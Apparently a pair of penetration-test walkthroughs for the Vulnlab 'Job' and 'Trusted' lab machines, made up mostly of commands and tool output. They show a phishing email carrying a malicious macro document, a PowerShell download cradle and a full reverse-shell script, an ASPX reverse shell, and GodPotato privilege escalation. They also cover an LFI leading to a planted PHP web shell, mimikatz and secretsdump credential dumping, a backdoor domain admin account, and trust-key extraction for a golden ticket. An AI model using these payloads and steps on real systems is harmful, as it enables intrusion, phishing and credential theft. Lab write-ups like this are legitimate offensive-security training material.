vulnlab-job

vulnlab-job

From Phishing to adminEnrique A.
Tools used : sendmail , msfconsole , msfvenom , godpotato

nmap scan

PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: JOB, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Job.local
| http-methods: 
|_  Potentially risky methods: TRACE
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-28T14:15:50+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: JOB
|   NetBIOS_Domain_Name: JOB
|   NetBIOS_Computer_Name: JOB
|   DNS_Domain_Name: job
|   DNS_Computer_Name: job
|   Product_Version: 10.0.20348
|_  System_Time: 2024-06-28T14:15:10+00:00
| ssl-cert: Subject: commonName=job
| Not valid before: 2024-06-27T12:41:55
|_Not valid after:  2024-12-27T12:41:55
Service Info: Host: JOB; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-06-28T14:15:12
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.24 seconds

 

cat /etc/hosts | grep job
10.10.114.36 job.local

website shows one email: career@job.local

Also, it states that if you are sending your resume, it should be as a libre office document

Phishing try1 getting some windows hashes

1st generata a msf payload

use auxiliary/fileformat/odt_badodt
set LHOST tun0
run

then send a mail, and catch the hashes received

sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey http://10.8.2.138/test" -a bad.odt 
Jun 21 15:46:10 kali sendemail[162513]: Email was sent successfully!
┌──(puck㉿kali)-[~/vulnlab/job]
└─$ impacket-smbserver -smb2support share .
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.99.156,51049)
[*] AUTHENTICATE_MESSAGE (JOB\jack.black,JOB)
[*] User JOB\jack.black authenticated successfully
[*] jack.black::JOB:aaaaaaaaaaaaaaaa:9b4c1be9c604bc2f1fdd46f203c4c1b3:010100000000000080f42a66e1c3da016f7c8cc4409768a80000000001001000640069004c004900700078006a00770003001000640069004c004900700078006a007700020010005500480078006a00430067004b007700040010005500480078006a00430067004b0077000700080080f42a66e1c3da0106000400020000000800300030000000000000000000000000200000f3afad144322c33a39d814751dfc312d1dd988dd18fbcedeab107cb49d9d84730a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] Closing down connection (10.10.99.156,51049)
[*] Remaining connections []
[*] Incoming connection (10.10.99.156,51050)
[*] AUTHENTICATE_MESSAGE (JOB\jack.black,JOB)
[*] User JOB\jack.black authenticated successfully
[*] 

The hash was uncrackable with john and rockyou.txt

.

Seems phishing is the way to go. So what I did is the following.

The following write-up provides a very good example on how to do this:

https://0xdf.gitlab.io/2020/02/01/htb-re.html

msf6 > set payload windows/x64/exec
payload => windows/x64/exec
msf6 > set LHOST 10.8.2.138
LHOST => 10.8.2.138
msf6 > set LPORT 80
LPORT => 80
msf6 > set cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/shell.txt');"
cmd => powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/shell.txt');

shell.txt

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ cat shell.txt            
function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
// Setup IPADDR
$address = '10.8.2.138'
// Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}
                                                                                                                          

 

 

.
msf6 exploit(multi/misc/openoffice_document_macro) > show options

Module options (exploit/multi/misc/openoffice_document_macro):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   BODY                       no        The message for the document body
   FILENAME  msf.odt          yes       The OpenOffice Text document name
   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the
                                         local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)


Payload options (windows/x64/exec):

   Name      Current Setting                         Required  Description
   ----      ---------------                         --------  -----------
   CMD       powershell.exe -nop -w hidden -ep bypa  yes       The command string to execute
             ss -c IEX(New-Object Net.WebClient).Do
             wnloadString('http://10.8.2.138/shell.
             txt');
   EXITFUNC  thread                                  yes       Exit technique (Accepted: '', seh, thread, process, none)


Exploit target:

   Id  Name
   --  ----
   0   Apache OpenOffice on Windows (PSH)



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/openoffice_document_macro) > set srvport 80
srvport => 80
msf6 exploit(multi/misc/openoffice_document_macro) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/openoffice_document_macro) > 
[*] Using URL: http://10.8.2.138/7Jnb1x3
[*] Server started.
[*] Generating our odt file for Apache OpenOffice on Windows (PSH)...
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Basic/Standard
[*] Packaging file: Basic/Standard/Module1.xml
[*] Packaging file: Basic/Standard/script-lb.xml
[*] Packaging file: Basic/script-lc.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Configurations2/accelerator
[*] Packaging file: Configurations2/accelerator/current.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/META-INF
[*] Packaging file: META-INF/manifest.xml
[*] Packaging directory: /usr/share/metasploit-framework/data/exploits/openoffice_document_macro/Thumbnails
[*] Packaging file: Thumbnails/thumbnail.png
[*] Packaging file: content.xml
[*] Packaging file: manifest.rdf
[*] Packaging file: meta.xml
[*] Packaging file: mimetype
[*] Packaging file: settings.xml
[*] Packaging file: styles.xml
[+] msf.odt stored at /home/puck/.msf4/local/msf.odt
exit
[*] Server stopped.
[*] Server stopped.

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ cp /home/puck/.msf4/local/msf.odt.

now the mailicious odtis downloaded

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.114.36 - - [28/Jun/2024 10:05:37] "GET /7Jnb1x3 HTTP/1.1" 200 -


──(puck㉿kali)-[~/vulnlab/job]
└─$ sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey pls check my cv http://10.8.2.138/test" -a msf.odt
Jun 28 10:03:37 kali sendemail[41500]: Email was sent successfully!

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ rm 7Jnb1x3 
└─$ cp cp shell.txt 7Jnb1x3 


run again !
sendemail -s job.local -f "puck <puck@vulnlab.com>" -t career@job.local -o tls=no -m "hey pls check my cv http://10.8.2.138>
Jun 28 10:03:37 kali sendemail[41500]: Email was sent successfully!

now the shell is downloaded
┌──(puck㉿kali)-[~/vulnlab/job]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.114.36 - - [28/Jun/2024 10:02:57] "GET /7Jnb1x3 HTTP/1.1" 200 -
10.10.114.36 - - [28/Jun/2024 10:04:02] "GET /7Jnb1x3 HTTP/1.1" 200 -


And we catch the shell as user

.
┌──(puck㉿kali)-[~/vulnlab/job]
└─$ rlwrap nc -nlvp 443                  
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 52139
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\LibreOffice\program>whoami
job\jack.black

c:\Users\jack.black\Desktop>type user.txt
VL{0fa1<REDACTED>5dc1}
PS C:\inetpub\wwwroot> dir


    Directory: C:\inetpub\wwwroot


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----        11/10/2021   8:52 PM                aspnet_client                                                        
d-----         11/9/2021   9:24 PM                assets                                                               
d-----         11/9/2021   9:24 PM                css                                                                  
d-----         11/9/2021   9:24 PM                js                                                                   
-a----        11/10/2021   9:01 PM            298 hello.aspx                                                           
-a----         11/7/2021   1:05 PM           3261 index.html                                                           


PS C:\inetpub\wwwroot> curl http://10.8.2.138/cmdasp.aspx -o cmdasp.aspx
PS C:\inetpub\wwwroot> curl http://10.8.2.138/reverse.aspx -o reverse.aspx

 

Privesc

After checking files on folders on this machine, I noticed that inetpub/wwwroot will allow us to upload files to the website

I created a aspx revshell with

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.2.138 LPORT=9001 -f aspx > reverse.aspx

ant then did a curl http://job.local/reverse.aspx , to get a new shell

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 53689
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

c:\windows\system32\inetsrv>cd c:\temp
cd c:\temp

c:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443" .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
.\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443" .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
[*] CombaseModule: 0x140720521084928
[*] DispatchTable: 0x140720523675512
[*] UseProtseqFunction: 0x140720522968944
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\a0c54595-80de-4e4f-a985-93a2101db089\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b002-0854-ffff-ad4d-dae1b390a835
[*] DCOM obj OXID: 0x7374a001401060e1
[*] DCOM obj OID: 0x734f5c52566383ce
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 988 Token:0x732  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3552

and we have a admin shell

SeImpersonatePrivilege is enabled. , so we used GodPotato

┌──(puck㉿kali)-[~/vulnlab/job]
└─$ nc -nlvp 443  
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.114.36] 53837
Microsoft Windows [Version 10.0.20348.350]
(c) Microsoft Corporation. All rights reserved.

C:\temp>whoami
whoami
nt authority\system

c:\Users\Administrator\Desktop>type root.txt
type root.txt
VL{0102<REDACTED>5152}

 

That’s all.
We now have  a Admin reverse shell.

 

vulnlab-trusted

Vulnlab trusted

nmap

enum

gobuster dir -x php -w /usr/share/wordlists/dirb/big.txt -u http://10.10.146.246/dev/

http://lab.trusted.vl/dev/index.html?view=php://filter/convert.base64-encode/resource=C:\xampp\htdocs\dev\db.php

echo "PD9waHAgDQokc2VydmVybmFtZSA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIlN1cGVyU2VjdXJlTXlTUUxQYXNzdzByZDEzMzcuIjsNCg0KJGNvbm4gPSBteXNxbGlfY29ubmVjdCgkc2VydmVybmFtZSwgJHVzZXJuYW1lLCAkcGFzc3dvcmQpOw0KDQppZiAoISRjb25uKSB7DQogIGRpZSgiQ29ubmVjdGlvbiBmYWlsZWQ6ICIgLiBteXNxbGlfY29ubmVjdF9lcnJvcigpKTsNCn0NCmVjaG8gIkNvbm5lY3RlZCBzdWNjZXNzZnVsbHkiOw0KPz4=" | base64 -d  
<?php 
$servername = "localhost";
$username = "root";
$password = "SuperSecureMySQLPassw0rd1337.";

$conn = mysqli_connect($servername, $username, $password);

if (!$conn) {
  die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
?>

.

upload php shell ( crackstation can crack Robert’s hash )

──(puck㉿kali)-[~/vulnlab/trusted]
└─$ mysql -u root -h lab.trusted.vl -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 8
Server version: 10.4.24-MariaDB mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use news
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [news]> select * from users;
+----+------------+--------------+-----------+----------------------------------+
| id | first_name | short_handle | last_name | password                         |
+----+------------+--------------+-----------+----------------------------------+
|  1 | Robert     | rsmith       | Smith     | 7e7abb54bbef42f0fbfa3007b368def7 |
|  2 | Eric       | ewalters     | Walters   | d6e81aeb4df9325b502a02f11043e0ad |
|  3 | Christine  | cpowers      | Powers    | e3d3eb0f46fe5d75eed8d11d54045a60 |
+----+------------+--------------+-----------+----------------------------------+
3 rows in set (0.022 sec)
MariaDB [news]> select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/dev/back.php';
Query OK, 1 row affected (0.023 sec)

MariaDB [news]> exit

trigger shell

http://lab.trusted.vl/dev/back.php?c=powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138/puckshell.txt');/

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.146.246 - - [26/Jun/2024 08:13:02] "GET /puckshell.txt HTTP/1.1" 200 -


┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ nc -nlvp 443  
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.146.246] 64409
Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\dev>whoami
nt authority\system

Get some more hashes

C:\temp>hostname
labdc

C:\temp>whoami
nt authority\system

c:\temp>curl http://10.8.2.138/mimikatz.exe -o mimi.exe

C:\temp>mimi

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/


mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 1685702 (00000000:0019b8c6)
Session           : Batch from 0
User Name         : cpowers
Domain            : LAB
Logon Server      : LABDC
Logon Time        : 6/26/2024 6:30:01 AM
SID               : S-1-5-21-2241985869-2159962460-1278545866-1107
    msv :	
     [00000003] Primary
     * Username : cpowers
     * Domain   : LAB
     * NTLM     : 322db798a55f85f09b3d61b976a13c43
     * SHA1     : e845d39122d58246ff7e28a282e8ed0e19ede373
     * DPAPI    : 01644e36ac919f8de1101ff9fde5a7fb
    tspkg :	
    wdigest :	
     * Username : cpowers
     * Domain   : LAB
     * Password : (null)
    kerberos :	
     * Username : cpowers
     * Domain   : LAB.TRUSTED.VL
     * Password : (null)
    ssp :	
    credman :	
    cloudap :	




mimikatz # exit
Bye!


examine more

C:\temp>hostname
labdc

C:\temp>whoami
nt authority\system

C:\temp>net user puck Passw0rd123! /add /domain
The command completed successfully.


C:\temp>net localgroup Administrators puck /add /domain
The command completed successfully.


C:\temp>

We can now also rdp to lab.trusted.vl

──(puck㉿kali)-[~/vulnlab/trusted]
└─$ xfreerdp /v:10.10.250.102 /u:puck          
[11:21:24:778] [102538:102539] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[11:21:24:778] [102538:102539] [WARN][com.freerdp.crypto] - CN = labdc.lab.trusted.vl
Password: 

 

┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ impacket-secretsdump 'puck@lab.trusted.vl'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x68580865f85a4743db214876adf784df
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:86a9ee70dfd64d20992283dc5721b475:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:75878369ad33f35b7070ca854100bc07:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c7a03c565c68c6fac5f8913fab576ebd:::
lab.trusted.vl\rsmith:1104:aad3b435b51404eeaad3b435b51404ee:30ef48d2054363df9244bc0d476e93dd:::
lab.trusted.vl\ewalters:1106:aad3b435b51404eeaad3b435b51404ee:56d93bd5a8250652c7430a4467a8540a:::
lab.trusted.vl\cpowers:1107:aad3b435b51404eeaad3b435b51404ee:322db798a55f85f09b3d61b976a13c43:::
puck:2102:aad3b435b51404eeaad3b435b51404ee:ab4f5a5c42df5a0ee337d12ce77332f5:::
LABDC$:1000:aad3b435b51404eeaad3b435b51404ee:61f6701481ff18844346b2f8ca47119a:::
TRUSTED$:1103:aad3b435b51404eeaad3b435b51404ee:88b2e30fba183f0fcdaba561a6ae64f5:::
[*] Kerberos keys grabbed

                                                                                                              
┌──(puck㉿kali)-[~/vulnlab/trusted]

 

 

then evil-winrm in lab.trusted.vl

                                                                                                              
┌──(puck㉿kali)-[~/vulnlab/trusted]
└─$ evil-winrm -u puck -p Passw0rd123! -i lab.trusted.vl
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\puck\Documents> cd c:\temp
*Evil-WinRM* PS C:\temp> whoami
lab\puck
*Evil-WinRM* PS C:\temp> . ./PowerView.ps1


At C:\temp\PowerView.ps1:

Forest                  : trusted.vl
DomainControllers       : {labdc.lab.trusted.vl}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  : trusted.vl
PdcRoleOwner            : labdc.lab.trusted.vl
RidRoleOwner            : labdc.lab.trusted.vl
InfrastructureRoleOwner : labdc.lab.trusted.vl
Name                    : lab.trusted.vl

Forest                  : trusted.vl
DomainControllers       :
Children                :
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  :
PdcRoleOwner            :
RidRoleOwner            :
InfrastructureRoleOwner :
Name                    : trusted.vl



*Evil-WinRM* PS C:\temp> Get-DomainTrust


SourceName      : lab.trusted.vl
TargetName      : trusted.vl
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 9/14/2022 6:42:24 PM
WhenChanged     : 6/26/2024 6:21:06 AM


 

Trust Abuse

Using article, we can abuse  child->parent domain trust relationship and escalate to enterprise domain.

We need the krbtgt hash of lab.trusted.vl and the SIDs of both domains, then with mimikatz we  forge a golden ticket for the enterprise domain admin

lsadump::dcsync /domain:lab.trusted.vl /all

 

Getting the domain SID of lab.trusted.vl and trusted.vl by running

*Evil-WinRM* PS C:\temp> ./mimi.exe  "lsadump::trust /patch" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::trust /patch

Current domain: LAB.TRUSTED.VL (LAB / S-1-5-21-2241985869-2159962460-1278545866)

Domain: TRUSTED.VL (TRUSTED / S-1-5-21-3576695518-347000760-3731839591)
 [  In ] LAB.TRUSTED.VL -> TRUSTED.VL
    * 6/26/2024 9:25:12 AM - CLEAR   - bd e0 30 b1 e3 5a 6f 28 d7 db 2d 12 f0 19 86 28 ee be df fa 8f 77 b0 7c 8a 82 05 e0 3f c0 85 81 2d 3a 45 eb 64 22 c6 e5 a3 e0 04 3f f8 fd 6d 59 d5 67 36 5d 32 f5 f2 01 3d 4a e9 29 91 c7 30 fa a4 a5 52 22 e6 17 09 c7 86 36 d7 ae 92 38 d2 7f 7a ec 7c 92 97 b6 e7 8f d3 59 74 97 31 70 8a 7d 88 11 29 e4 5c 0e ab b8 41 2a 35 39 68 f4 af 7b 01 bb 5c 6b a6 1d a6 2a d9 dc da 70 62 7e 75 c2 c4 95 9c 61 7c 98 b7 39 76 64 d6 d4 a3 9f fb f0 3c d7 76 d5 26 95 1b 96 e8 3f c2 a7 f2 99 9e 0a e9 b4 30 bf a9 6b 3a e1 ed 1e 33 17 70 43 41 d2 14 11 39 c8 d2 d5 41 54 24 f9 85 db 69 22 70 85 62 47 06 e3 2c 0a e1 bb 6e 8a 41 e8 09 1e e8 27 59 9e e7 14 d3 aa 3f 05 c3 6e 89 12 e7 cc 11 af 1a d9 a5 36 f8 2f e5 bb d5 d9 17 29 7d 11 d5 d5
    * aes256_hmac       87a58ba0eaa56e07d5eaadca5d5d043c64ef85efe9420279a98919d6d7b919f8
    * aes128_hmac       afe52545c051a7f537ea55d5abc96d31
    * rc4_hmac_nt       f3a4b4a5c1302b7da515ce596ad3281d

 [ Out ] TRUSTED.VL -> LAB.TRUSTED.VL
    * 6/26/2024 9:25:10 AM - CLEAR   - 31 dd 12 7a 9e f6 47 94 cd 56 25 1b 58 e6 e3 53 f6 77 19 eb ac bf 4f 28 1a 2d 1e 60 3b 16 6a 94 f7 25 a3 2e 40 13 fb 3d bf a4 42 a2 b1 42 bd 64 89 d6 8a 72 91 a7 da 2d ba 83 1e 6c 25 af ef ec 8c 98 3a 67 ad 67 a1 d8 d9 55 f4 dd 23 bc 93 01 16 10 7e ef 64 84 a3 be 02 25 c8 a6 45 93 b4 e8 5c 27 ee 44 06 a7 81 a0 c2 8e 3c 99 32 2b 4e 5a 19 58 55 8c bb b3 c3 24 55 9f 49 da ba 08 65 1c 3d 3c 59 36 cf 0c fe 15 3c 56 60 c8 1b e1 dd 33 54 c4 dd e3 2a a5 20 bf 9d fe dc ff 9e 61 7b 15 08 d3 22 6b a1 71 2d 48 5e 40 3f 66 fb d2 c6 cc 0c d5 af f1 0d 65 3d 72 45 2a c2 2e d7 86 e3 e0 4f 59 c2 61 fc d2 de d1 87 66 4f f8 f6 ee a4 ed e5 3e df bc b5 86 3a 13 ba ee 39 cb 28 84 58 7d 8d 65 43 28 9b f2 b4 d0 69 99 d2 c1 37 d5 d6 45
    * aes256_hmac       3e09cb23acb863c8d23bf8d07eace010cb980d5cfbda991345e4a7cec5352ad7
    * aes128_hmac       01b6b1243a4a9b0ed26869f79ef1ae75
    * rc4_hmac_nt       4eba988516b0b0fcf99c8f1b10e552de

 [ In-1] LAB.TRUSTED.VL -> TRUSTED.VL
    * 5/27/2023 4:19:25 PM - CLEAR   - ea 31 66 22 35 93 0e ef 05 dd e5 94 f0 70 b5 dd 2c de b4 ec 7a 47 73 ae 20 45 15 00 9c 0c 1a 7e 9a f4 68 c7 22 c9 d2 35 cb 67 bb 8d 56 7e 5b 9f 4e 9c b4 4c 77 a6 b7 41 2e d9 3d e4 87 73 5b ee 44 8b 4f 3f f3 e8 ac 32 21 08 db 79 9a 55 2b a0 6f c2 dd 69 c6 9a b7 4d e1 8a 4c f6 e8 0b 47 a9 cb cf 4d 6f 14 8c 28 44 66 63 85 20 13 3b c8 93 bd 20 38 ff 6c 73 d3 2a 61 a3 10 fc 2f d5 af 29 a8 5b 28 09 0d 1f 17 46 8d 7d 09 fa e8 55 61 2e d7 6b 3a 70 38 11 e0 42 08 4b 5b 2b be 53 2c 62 97 64 42 4e 11 fb 50 ed 2f ef 58 38 be 20 a4 4b f6 cf a7 45 18 73 56 be cd 6c 0a 78 16 f7 51 ae 82 59 95 7a 33 f0 27 a6 6d 08 62 ca 74 5f 82 13 c2 d2 aa 7b 12 96 b8 16 27 2e ee 48 bd e4 21 41 db a2 e2 92 ca f3 5d d6 76 cc b5 66 28 2a 87 92
    * aes256_hmac       a7880265164670ddfc041c250bdf7d8166bf8ca0c06d86c3ddec12620fdfb800
    * aes128_hmac       9d59311c51bd3eb6cc846cf1af53c80f
    * rc4_hmac_nt       fdb9239325aed982da5f521116ffbcaf

 [Out-1] TRUSTED.VL -> LAB.TRUSTED.VL
    * 6/26/2024 9:25:10 AM - CLEAR   - 7a 6f b9 f0 49 87 53 be 90 63 63 9c d9 8e 15 f5 ce b5 60 98 6d e6 08 0f 7b ab 3a 7b e3 59 48 a4 f4 6e 6f 1a cc 87 f2 19 81 9a 3b e5 f6 b0 59 28 ad 97 e2 fd fb 39 f8 15 98 ca 4e a9 c4 04 60 15 6a ca 97 0e 20 81 77 42 ac c0 c9 0d 4f 49 4d 64 ee 2a 0f ed aa 4c f3 5b fb 51 ef 50 1a 84 5d 15 a8 9c ce a5 37 a7 02 47 ff 67 0d 1a 59 1c f6 c9 11 9f a2 55 7f c0 45 db 29 77 db 54 9e 46 23 ea 60 a3 9d 9c 11 61 44 51 d2 3f 32 cc e3 67 95 1c a5 0a 0f c6 96 3d e2 a3 53 2b 92 41 a2 a2 46 9e 27 65 c4 84 b0 6f 6e 4e 95 70 0e ed a6 a9 8e 1b ac 66 e8 40 61 9f 6e 70 44 6e b1 fc dd a7 72 9d 3e bd ac b7 0e b9 6b 3c a6 b5 a0 d2 9b 74 91 39 02 f8 7c 31 16 09 7c 52 f3 e9 00 3e 0c 88 46 a3 05 c6 5c 2b f9 3c 0c 21 bd b2 04 8b bc 8a b0 74
    * aes256_hmac       bfc64ba951d28743ef247deb0fa7d69197b9fda301c64ae0765ba9c5c6418183
    * aes128_hmac       0fe86c75c4b6686fcae0bd01d0a1fa2c
    * rc4_hmac_nt       cddbd971c2e3e4ef64b4eb024e4e75c0


mimikatz(commandline) # exit
Bye!

Next forge a ticket for enterprise domain admin

